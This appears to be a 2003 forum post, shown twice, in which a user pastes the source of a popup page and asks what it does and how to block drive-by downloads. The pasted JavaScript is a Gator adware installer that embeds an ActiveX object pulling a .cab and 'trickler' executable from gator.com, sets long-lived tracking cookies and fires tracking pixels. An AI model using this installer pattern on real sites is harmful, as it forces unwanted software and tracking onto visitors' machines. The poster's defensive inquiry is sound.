rolli
07-05-2003, 03:30 AM
Hi,
recently I visited a website and several popups appeared. After having clicked them off, I found a resistant website with the following source code:
.<html>
<head>
<title>____________________</title>
.<script language="JavaScript">
var pdppi_loaded = false;
function sendPartnerEvent( ){
var event_src = "";
if( event_src ){
document.partnerEventPixel.src = event_src;
}
}
function sendPartnerImp(){
var event_src = "";
if( event_src ){
var eventImg = new Image;
eventImg.src = event_src;
}
}
function changeEventPixelSrc( eventid, eventnum ){
var event_src = "/uniq3/PwVE1sCo-sIAAEswczg" + eventnum + ".gif?yic=HIC_FortuneCity7&eventid=" + eventid + "&reason=0&wuid=PwVE1sCo-sIAAEswczg&ver=0";
switch( eventnum ){
case 2:
document.eventPixel2.src = event_src;
break;
default:
document.eventPixel1.src = event_src;
}
}
function openNew( ){
var pos_top = (screen.height/2)-(300/2);
var pos_left = (screen.width/2)-(300/2);
window.open( '','ncr','width=300,height=300,top=' + pos_top + ',left=' + pos_left );
}
function sleep_close( wait ){
var jsTimer = wait * 1000;
setTimeout("window.close();",jsTimer);
return true;
}
function checkPlugin( ){
var js_plugin_error = 0;
var strObjType = typeof( IEGator );
if( 'object' == strObjType ){
var strParamsType = typeof( IEGator.params );
if ( strParamsType != 'string' ){
js_plugin_error += 1;
}
} else {
if('undefined' == strObjType){
js_plugin_error += 2;
}
else if( 'unknown' == strObjType ){
js_plugin_error += 4;
} else {
js_plugin_error += 8;
}
}
setCookie( "GatorWebPdpCookie_OfferedApps", ":1", 30 );
setCookie( "GatorWebPdpCookie_WUID", "PwVE1sCo-sIAAEswczg", 3650 );
setCookie( "GatorWebPdpCookie_PluginTimer", 1057311710, 3650 );
setCookie( "GatorWebPdpCookie_VisitedPartners", "hic_fortunecity7:1", 30 );
doHBPix();
if( js_plugin_error == 0 || pdppi_loaded ){
window.focus();
setCookie( "GatorWebPdpCookie_ApprovedApps", "", 3650 );
changeEventPixelSrc( 4011, 2 );
sendPartnerEvent( );
} else {
changeEventPixelSrc( 4012, 2 );
sleep_close( 30 );
}
sendPartnerImp();
}
function setCookie( name, value, days ){
var expiry = 1000 * 60 * 60 * 24 * days;
var expDate = new Date();
expDate.setTime(expDate.getTime() + expiry);
document.cookie = name + "=" + escape( value ) + "; expires=" + expDate.toGMTString() + "; path=/; domain=.gator.com";
}
function doHBPix(){
var newHBpix = "";
if( newHBpix ){
document.hbpix.src = newHBpix;
}
return true;
}
function embedPlugin( ){
document.writeln( "<object" );
document.writeln( " id=\"IEGator\"" );
document.writeln( " classid=\"CLSID:54e7e082-1da6-412e-96b5-c290fcef5329\"" );
document.writeln( " codebase=\"http://webpdp.gator.com/v3/download/iegator_4090_hd3ptdmgainads.cab\"" );
document.writeln( " align=\"baseline\"" );
document.writeln( " border=\"0\"" );
document.writeln( " width=\"2\"" );
document.writeln( " height=\"2\">" );
document.writeln( " <param name=\"params\" value=\"&fcn=hd&bgcolor=FFFFFF&ds=1&tkds=1&src=webpdp.gator.com/v3/download/trickler_4010.ex_&aic=HIC_FortuneCity7&pidel=this&email=&fname=&country=&zip=&wuid=PwVE1sCo-sIAAEswczg&rs=1&hdeulaurl=http://www.gatorcorporation.com/help/hd_postyes40/hd-post-yes40-p1f.html&did=0&apprq=\">" );
document.writeln( " <img src=\"images/pixel.gif\" width=\"2\" height=\"2\" alt=\"[Plugin]\">" );
document.writeln( "</object>" );
}
.</script>
.<script language="JavaScript" for="IEGator" event="onPluginCreated()">
pdppi_loaded = true;
return 7;
.</script>
.</head>
.<body bgcolor="#FFFFFF" onLoad="checkPlugin();" onUnload="">
.<center>.<font>Please Wait ....</font>.</center>
.<img src="images/pixel.gif" name="eventPixel1" height="1" width="1" alt="[pixel1]">
.<img src="images/pixel.gif" name="eventPixel2" height="1" width="1" alt="[pixel2]">
.<img src="images/pixel.gif" name="partnerEventPixel" height="1" width="1" alt="[pixel3]">
.<img src="images/pixel.gif" name="hbpix" height="1" width="1" alt="[pixel4]">
.<script language="JavaScript1.2">
changeEventPixelSrc( 4001, 1 );
embedPlugin();
.</script>
.</body>
.</html>
What I exactly want to know is what does the js, and how can I protect myself against unwanted drive by downloads. Is there any possibility to make this script inoperative?
rolli
recently I visited a website and several popups appeared. After having clicked them off, I found a resistant website with the following source code:
.<html>
<head>
<title>____________________</title>
.<script language="JavaScript">
var pdppi_loaded = false;
function sendPartnerEvent( ){
var event_src = "";
if( event_src ){
document.partnerEventPixel.src = event_src;
}
}
function sendPartnerImp(){
var event_src = "";
if( event_src ){
var eventImg = new Image;
eventImg.src = event_src;
}
}
function changeEventPixelSrc( eventid, eventnum ){
var event_src = "/uniq3/PwVE1sCo-sIAAEswczg" + eventnum + ".gif?yic=HIC_FortuneCity7&eventid=" + eventid + "&reason=0&wuid=PwVE1sCo-sIAAEswczg&ver=0";
switch( eventnum ){
case 2:
document.eventPixel2.src = event_src;
break;
default:
document.eventPixel1.src = event_src;
}
}
function openNew( ){
var pos_top = (screen.height/2)-(300/2);
var pos_left = (screen.width/2)-(300/2);
window.open( '','ncr','width=300,height=300,top=' + pos_top + ',left=' + pos_left );
}
function sleep_close( wait ){
var jsTimer = wait * 1000;
setTimeout("window.close();",jsTimer);
return true;
}
function checkPlugin( ){
var js_plugin_error = 0;
var strObjType = typeof( IEGator );
if( 'object' == strObjType ){
var strParamsType = typeof( IEGator.params );
if ( strParamsType != 'string' ){
js_plugin_error += 1;
}
} else {
if('undefined' == strObjType){
js_plugin_error += 2;
}
else if( 'unknown' == strObjType ){
js_plugin_error += 4;
} else {
js_plugin_error += 8;
}
}
setCookie( "GatorWebPdpCookie_OfferedApps", ":1", 30 );
setCookie( "GatorWebPdpCookie_WUID", "PwVE1sCo-sIAAEswczg", 3650 );
setCookie( "GatorWebPdpCookie_PluginTimer", 1057311710, 3650 );
setCookie( "GatorWebPdpCookie_VisitedPartners", "hic_fortunecity7:1", 30 );
doHBPix();
if( js_plugin_error == 0 || pdppi_loaded ){
window.focus();
setCookie( "GatorWebPdpCookie_ApprovedApps", "", 3650 );
changeEventPixelSrc( 4011, 2 );
sendPartnerEvent( );
} else {
changeEventPixelSrc( 4012, 2 );
sleep_close( 30 );
}
sendPartnerImp();
}
function setCookie( name, value, days ){
var expiry = 1000 * 60 * 60 * 24 * days;
var expDate = new Date();
expDate.setTime(expDate.getTime() + expiry);
document.cookie = name + "=" + escape( value ) + "; expires=" + expDate.toGMTString() + "; path=/; domain=.gator.com";
}
function doHBPix(){
var newHBpix = "";
if( newHBpix ){
document.hbpix.src = newHBpix;
}
return true;
}
function embedPlugin( ){
document.writeln( "<object" );
document.writeln( " id=\"IEGator\"" );
document.writeln( " classid=\"CLSID:54e7e082-1da6-412e-96b5-c290fcef5329\"" );
document.writeln( " codebase=\"http://webpdp.gator.com/v3/download/iegator_4090_hd3ptdmgainads.cab\"" );
document.writeln( " align=\"baseline\"" );
document.writeln( " border=\"0\"" );
document.writeln( " width=\"2\"" );
document.writeln( " height=\"2\">" );
document.writeln( " <param name=\"params\" value=\"&fcn=hd&bgcolor=FFFFFF&ds=1&tkds=1&src=webpdp.gator.com/v3/download/trickler_4010.ex_&aic=HIC_FortuneCity7&pidel=this&email=&fname=&country=&zip=&wuid=PwVE1sCo-sIAAEswczg&rs=1&hdeulaurl=http://www.gatorcorporation.com/help/hd_postyes40/hd-post-yes40-p1f.html&did=0&apprq=\">" );
document.writeln( " <img src=\"images/pixel.gif\" width=\"2\" height=\"2\" alt=\"[Plugin]\">" );
document.writeln( "</object>" );
}
.</script>
.<script language="JavaScript" for="IEGator" event="onPluginCreated()">
pdppi_loaded = true;
return 7;
.</script>
.</head>
.<body bgcolor="#FFFFFF" onLoad="checkPlugin();" onUnload="">
.<center>.<font>Please Wait ....</font>.</center>
.<img src="images/pixel.gif" name="eventPixel1" height="1" width="1" alt="[pixel1]">
.<img src="images/pixel.gif" name="eventPixel2" height="1" width="1" alt="[pixel2]">
.<img src="images/pixel.gif" name="partnerEventPixel" height="1" width="1" alt="[pixel3]">
.<img src="images/pixel.gif" name="hbpix" height="1" width="1" alt="[pixel4]">
.<script language="JavaScript1.2">
changeEventPixelSrc( 4001, 1 );
embedPlugin();
.</script>
.</body>
.</html>
What I exactly want to know is what does the js, and how can I protect myself against unwanted drive by downloads. Is there any possibility to make this script inoperative?
rolli